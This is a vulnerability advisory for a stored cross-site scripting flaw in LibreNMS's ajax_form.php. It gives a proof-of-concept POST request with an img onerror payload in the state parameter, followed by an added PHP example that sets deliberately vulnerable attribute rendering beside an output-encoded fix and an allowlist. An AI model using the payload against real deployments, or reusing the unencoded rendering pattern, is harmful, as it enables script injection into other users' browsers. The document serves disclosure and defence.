CVE-2025-23200: LibreNMS Misc Section Stored Cross-site Scripting vulnerability
StoredXSS-LibreNMS-MiscSection
Description:
Stored XSS via the state parameter of ajax_form.php in LibreNMS version 24.10.1 (https://github.com/librenms/librenms). The value submitted as state is saved as a device attribute and later rendered in the Misc section. A remote attacker with an authenticated session (the request below carries a session cookie and CSRF token) can store a script payload there; when any user views or interacts with the page that displays the stored value, the script executes in that user's browser, leading to potential unauthorized actions or data exposure.
Request:
POST /ajax_form.php HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: <your_XSRF_token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>

type=override-config&device_id=1&attrib=override_icmp_disable&state="><img%20src%20onerror="alert(1)">
Root cause: in the dynamic_override_config function, the line
$attrib_val = get_dev_attrib($device, $name);
(at Line 778) reads the stored attribute value back from the database, and that value is then placed into the page markup without any sanitization or output encoding. The stored '">' therefore closes the attribute it is written into and the <img ... onerror=...> that follows is parsed as HTML instead of being shown as text.
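The following PHP is an added example and not LibreNMS code. It models the store-then-render pattern described above with a hypothetical in-memory attribute table (get_dev_attrib_example, render_override_vulnerable, render_override_fixed and validate_state_example are invented names, not functions in the project) and shows the vulnerable interpolation next to the output-encoded form. It also adds a server-side allowlist for state as a second layer; that the state of override_icmp_disable is a boolean toggle with a tiny value space is an assumption made here.

```php
<?php
// Added example, not LibreNMS code. Reproduces the pattern
// "stored device attribute -> HTML attribute value" from the advisory.
declare(strict_types=1);

// Constructed stand-in for the device attribute table that get_dev_attrib()
// reads. The value is the PoC's state parameter after URL decoding.
$device_attribs_example = [
    'override_icmp_disable' => '"><img src onerror="alert(1)">',
];

// Hypothetical stand-in for get_dev_attrib($device, $name).
function get_dev_attrib_example(array $attribs, string $name): ?string
{
    return $attribs[$name] ?? null;
}

// Vulnerable pattern: the stored value is concatenated into a quoted
// attribute without encoding, so '">' ends the attribute and the <img>
// tag that follows becomes live markup.
function render_override_vulnerable(array $attribs, string $name): string
{
    $attrib_val = get_dev_attrib_example($attribs, $name) ?? '';
    return '<input type="checkbox" name="' . $name . '" value="' . $attrib_val . '">';
}

// Output encoding at the point of rendering. ENT_QUOTES covers both quote
// styles, ENT_SUBSTITUTE avoids returning '' on invalid UTF-8.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: same lookup, encoded before it touches the markup.
function render_override_fixed(array $attribs, string $name): string
{
    $attrib_val = get_dev_attrib_example($attribs, $name) ?? '';
    return '<input type="checkbox" name="' . esc($name) . '" value="' . esc($attrib_val) . '">';
}

// Second layer, on the write path (ajax_form.php side). Assumption: the
// state of a boolean override only ever needs these spellings, so anything
// else is rejected before it reaches the database.
function validate_state_example(string $state): ?string
{
    $allowed = ['0', '1', 'true', 'false', 'on', 'off'];
    $norm = strtolower($state);
    return in_array($norm, $allowed, true) ? $norm : null;
}

function check(bool $ok, string $what): void
{
    if (!$ok) {
        fwrite(STDERR, "FAIL: $what\n");
        exit(1);
    }
}

// Self-check from the CLI: php example.php
$name  = 'override_icmp_disable';
$vuln  = render_override_vulnerable($device_attribs_example, $name);
$fixed = render_override_fixed($device_attribs_example, $name);

echo "vulnerable: $vuln\n";
echo "fixed:      $fixed\n";

check(str_contains($vuln, '<img src onerror='), 'payload survives as markup in vulnerable output');
check(!str_contains($fixed, '<img'), 'no tag in hardened output');
check(str_contains($fixed, '&quot;&gt;&lt;img'), 'payload is encoded as text in hardened output');
check(validate_state_example('"><img src onerror="alert(1)">') === null, 'allowlist rejects payload');
check(validate_state_example('1') === '1', 'allowlist keeps a normal toggle value');
echo "ok\n";
```

The check in render_override_fixed is the one that actually closes the advisory's finding: encoding belongs at the point of output, not only at input, because the same stored value may be rendered in more than one context. The allowlist is cheap defence in depth for a field whose legitimate values are known, but it does not replace output encoding for attributes that store free text.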